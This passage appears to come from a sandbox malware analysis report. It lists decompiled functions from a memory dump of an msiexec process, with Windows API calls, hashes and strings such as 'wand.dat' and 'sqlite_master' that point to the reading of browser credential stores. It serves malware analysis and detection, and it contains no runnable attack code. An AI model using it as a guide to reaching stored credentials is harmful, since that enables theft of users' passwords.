                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                    APIs
                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                    • String ID: MS Sans Serif
                                                    • API String ID: 210187428-168460110
                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcsicmpmemset
                                                    • String ID: edit
                                                    • API String ID: 2747424523-2167791130
                                                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                    APIs
                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                    • API String ID: 3150196962-1506664499
                                                    • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                    • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                    APIs
                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memcmp
                                                    • String ID:
                                                    • API String ID: 3384217055-0
                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$memcpy
                                                    • String ID:
                                                    • API String ID: 368790112-0
                                                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                    APIs
                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                    • String ID:
                                                    • API String ID: 1889144086-0
                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                    APIs
                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                    • String ID:
                                                    • API String ID: 1661045500-0
                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                    APIs
                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                    Strings
                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpymemset
                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                    • API String ID: 1297977491-2063813899
                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                    APIs
                                                    • memset.MSVCRT ref: 0040560C
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                    • String ID: *.*$dat$wand.dat
                                                    • API String ID: 2618321458-1828844352
                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                    APIs
                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                    • wcslen.MSVCRT ref: 00410C74
                                                    • _wtoi.MSVCRT(?), ref: 00410C80
                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                    • String ID:
                                                    • API String ID: 1549203181-0
                                                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                    APIs
                                                    • memset.MSVCRT ref: 00412057
                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                    • String ID:
                                                    • API String ID: 3550944819-0
                                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                    APIs
                                                    • free.MSVCRT ref: 0040F561
                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$free
                                                    • String ID: g4@
                                                    • API String ID: 2888793982-2133833424
                                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: @
                                                    • API String ID: 3510742995-2766056989
                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                    • memset.MSVCRT ref: 0040AF18
                                                    • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@memcpymemset
                                                    • String ID:
                                                    • API String ID: 1865533344-0
                                                    • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                    • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                    APIs
                                                    • memset.MSVCRT ref: 004144E7
                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                    • memset.MSVCRT ref: 0041451A
                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                    • String ID:
                                                    • API String ID: 1127616056-0
                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                    • memset.MSVCRT ref: 0042FED3
                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset
                                                    • String ID: sqlite_master
                                                    • API String ID: 438689982-3163232059
                                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                    APIs
                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                    • String ID:
                                                    • API String ID: 3917621476-0
                                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                    APIs
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                    • wcscat.MSVCRT ref: 0041101F
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                    • String ID:
                                                    • API String ID: 822687973-0
                                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                                    • malloc.MSVCRT ref: 00417459
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7556DF80,?,0041755F,?), ref: 00417478
                                                    • free.MSVCRT ref: 0041747F
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$freemalloc
                                                    • String ID:
                                                    • API String ID: 2605342592-0
                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                    • String ID:
                                                    • API String ID: 2678498856-0
                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                    APIs
                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Item
                                                    • String ID:
                                                    • API String ID: 3888421826-0
                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                    APIs
                                                    • memset.MSVCRT ref: 00417B7B
                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                    • String ID:
                                                    • API String ID: 3727323765-0
                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                    APIs
                                                    • memset.MSVCRT ref: 0040F673
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                    • strlen.MSVCRT ref: 0040F6A2
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                    Memory Dump Source
